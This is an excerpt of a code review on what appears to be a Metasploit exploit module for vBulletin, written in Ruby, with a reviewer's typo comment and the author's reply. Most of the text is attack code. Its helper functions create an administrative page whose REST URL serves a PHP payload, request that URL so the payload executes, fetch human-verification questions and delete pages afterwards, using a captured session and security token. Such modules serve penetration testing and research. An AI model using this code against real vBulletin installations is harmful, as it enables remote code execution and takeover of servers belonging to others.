modules/exploits/multi/http/vbulletin_getindexablecontent.rb

```diff
@@ -0,0 +1,667 @@
+      'vars_post' => {
+        'pageid' => pageid.to_s,
+        'securitytoken' => login_token.to_s
+      }
+    })
+
+    unless res && res.code == 200
+      return nil
+    end
+
+    parsed_resp = JSON.parse(res.body.to_s)
+
+    if parsed_resp['errors']
+      return nil
+    end
+
+    print_good("Successfully deleted page with pageid: #{pageid}")
+
+    true
+  end
+
+  # Makes request to execute PHP payload.
+  def exec_payload(rest_url)
+    print_status("Sending request to '#{normalize_uri(target_uri.path, rest_url)}' to execute payload.")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, rest_url)
+    })
+
+    unless res && res.code == 200
+      return nil
+    end
+
+    print_good('Request made succesfully, payload should be executing now.')
+
+    true
+  end
+
+  # Fetches a human verification question based on hash.
+  def get_hv_question(hash)
+    print_status("Sending request to '#{target_uri.path}/ajax/api/hv/fetchHvQuestion' to get human verification question.")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'fetchHvQuestion'),
+      'vars_post' => {
+        'hash' => hash.to_s
+      }
+    })
+
+    unless res && res.code == 200 && res.body.to_s !~ /"errors"/
+      return nil
+    end
+
+    res.body.to_s.tr('"', '')
+  end
+
+  # Saves a new page to the vBulletin install
+  def save_page(nodeid, userid, pt_id, payload_url, wi_id, session_info)
+    print_status("Sending request to '#{target_uri.path}/admin/savepage' to save new page at '#{payload_url}'.")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'savepage'),
+      'cookie' => [session_info[1]],
+      'vars_post' => {
+        'input[ishomeroute]' => '0',
+        'input[pageid]' => '0',
+        'input[nodeid]' => nodeid.to_s,
+        'input[userid]' => userid.to_s,
+        'input[screenlayoutid]' => '2',
+        'input[templatetitle]' => rand_text_alphanumeric(rand(5..10)),
+        'input[displaysections[0]]' => '[]',
+        'input[displaysections[1]]' => '[]',
+        'input[displaysections[2]]' => "[{\"widgetId\":\"23\",\"widgetInstanceId\":\"#{wi_id}\"}]",
+        'input[displaysections[3]]' => '[]',
+        'input[pagetitle]' => rand_text_alphanumeric(rand(5..10)),
+        'input[resturl]' => payload_url.to_s,
+        'input[metadescription]' => rand_text_alphanumeric(rand(5..10)),
+        'input[pagetemplateid]' => pt_id.to_s,
+        'url' => normalize_uri(target_uri.path),
+        'securitytoken' => session_info[0].to_s
+      }
+    })
+
+    unless res && res.code == 200
+      return nil
+    end
+
+    parsed_resp = JSON.parse(res.body.to_s)
+
+    unless parsed_resp['success']
+      return nil
+    end
+
+    print_good("Page succesfully create and should be accessible at '#{normalize_uri(target_uri.path, payload_url.to_s)}'.")
```

Comment:
`create` should be `created` here, e.g. "Page successfully *created* and should be..."

Reply:
Fixed, thank you.